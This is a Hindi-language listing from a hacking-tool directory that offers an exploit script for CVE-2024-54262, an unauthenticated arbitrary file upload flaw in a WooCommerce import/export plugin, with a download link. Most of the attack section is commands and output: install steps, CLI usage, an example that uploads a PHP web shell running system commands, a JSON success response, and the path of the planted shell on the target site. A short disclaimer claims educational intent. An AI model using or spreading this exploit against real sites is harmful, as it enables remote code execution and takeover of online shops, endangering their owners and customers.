Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-54262 — CVE-2024-54262 का शोषण: WooCommerce के लिए आयात/निर्यात में मनमाना फ़ाइल अपलोड | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2024-54262
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubnxploited/cve-2024-54262

CVE-2024-54262

CVE-2024-54262 का शोषण: WooCommerce के लिए आयात/निर्यात में मनमाना फ़ाइल अपलोड

रिपॉजिटरी देखें
41 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-54262

CVE-2024-54262 का शोषण: WooCommerce के लिए Import Export में मनमाना फ़ाइल अपलोड

अवलोकन

यह स्क्रिप्ट "Import Export for WooCommerce" WordPress प्लगइन में एक कमजोरी का शोषण करती है। यह कमजोरी अनधिकृत उपयोगकर्ताओं को मनमानी फ़ाइलें अपलोड करने की अनुमति देती है, जिससे संभावित रिमोट कोड निष्पादन (RCE) हो सकता है।

विशेषताएँ:

  • संस्करण जांच: स्वचालित रूप से जांचता है कि WordPress साइट एक कमजोर plugin संस्करण चला रही है या नहीं।
  • प्रमाणीकरण: आगे के शोषण के लिए WordPress लॉगिन का समर्थन करता है।
  • फ़ाइल अपलोड: RCE के लिए दुर्भावनापूर्ण PHP फ़ाइलें अपलोड करने की अनुमति देता है।

आवश्यक शर्तें:

  1. Python 3.x
  2. Required Python libraries:
    • requests
    • argparse

Install dependencies using:

root@kitploit:~
pip install requests

3.सुनिश्चित करें कि लक्ष्य WordPress साइट plugin के कमजोर संस्करण का उपयोग कर रही है।

उपयोग:

root@kitploit:~
usage: CVE-2024-54262.py [-h] --url URL --username USERNAME --password PASSWORD [--command COMMAND]

Exploit CVE-2024-54262: Arbitrary File Upload in Import Export for WooCommerce

options:
  -h, --help            show this help message and exit
  --url URL, -u URL     Base URL of the WordPress site
  --username USERNAME, -un USERNAME
                        Username for login
  --password PASSWORD, -p PASSWORD
                        Password for login
  --command COMMAND, -c COMMAND
                        PHP shell code to upload

उदाहरण:

root@kitploit:~
 CVE-2024-54262.py --url https://example.com --username admin --password admin --command "<?php system('ls'); ?>"

आउटपुट स्पष्टीकरण

  1. साइट कमजोर है।
    • इंगित करता है कि WordPress साइट एक कमजोर plugin संस्करण चला रही है।
  2. सफलतापूर्वक लॉग इन किया गया।
    • प्रदान किए गए क्रेडेंशियल्स के साथ सफल लॉगिन की पुष्टि करता है।
  3. root@kitploit:~
    {
        "status": true,
        "code": 104,
        "message": "Success",
        "data": {
            "file_name": "import_manual_1737090262.php",
            "total_requests": 1,
            "import_columns": "all",
            "product_search_type": "SKU",
            "product_operation": "create_new_update_existing",
            "field_separator": ","
        }
    }
    
    
    
  • शेल नाम: import_manual_1737090262.php
  • शेल पथ: wp-content/uploads/import-export-for-woocommerce/product/

अस्वीकरण

यह उपकरण केवल शैक्षिक उद्देश्यों के लिए है। लेखक इस स्क्रिप्ट के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है। स्पष्ट अनुमति के बिना सिस्टम तक अनधिकृत पहुँच या शोषण अवैध और अनैतिक है।

टूल डाउनलोड करें